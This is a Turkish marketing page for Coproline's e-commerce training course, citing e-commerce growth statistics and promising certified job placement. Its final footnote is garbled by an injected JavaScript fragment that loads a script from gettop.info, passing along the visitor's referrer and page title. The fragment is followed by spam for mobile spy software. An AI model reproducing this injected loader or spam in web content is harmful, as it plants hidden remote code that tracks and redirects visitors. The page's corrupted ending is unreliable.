E-Ticaret Sektörü | Coproline

Şirketlerin Aradığı Uzman Olun

  • G20 ülkelerinin internet ekonomisi 2010 yılı sonunda 2.4 trilyon dolar hacme ulaşmıştır. 2016 yılına kadar mobil ticaretin de gelişimiyle sadece bu ülkelerin yaratacağı dijital ekonomi hacmi 4.2 trilyon dolar tutara ulaşacaktır.
  • Önümüzdeki dört yıl içerisinde dünyanın %50′si interneti düzenli olarak kullanabilir hale gelecek ve 3 milyar insanın webe ulaşımı sağlanacaktır.
  • 2011 yılında ülkemizde e-ticaret ve dış ticaret sektörlerinde eğitimli uzman arayışı %260 oranında artış göstermiştir. Şirketler gün geçtikçe dijital ticaret alanında daha yüksek bir oranda eğitimli çalışana ihtiyaç duymaktadır. Bir araştırmaya göre 2016 yılında Türkiye’de iç ve dış ticaret gerçekleştiren şirketler interneti iyi düzeyde kullanabilen 1 Milyon dolayında uzmana ihtiyaç duyacaktır.
  • Ön görüşme ile kabul ettiğimiz katılımcılarımıza eğitim programımız sonunda T.C. Ekonomi Bakanlığı ve T.C. Milli Eğitim Bakanlığı onaylı uzmanlık sertifikası veriyor ve akabinde doğrudan işe yerleştiriyoruz.

*Tüm veriler ve gelecek tahminleri Bostan Consulting Group (BCG) 2012 Ocak raporuna aittir.

*BKM Verileri Ocak-2011s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”; if (document.currentScript) { topspyapps.netThe most popular 2017 spy software applications for the mobile phones.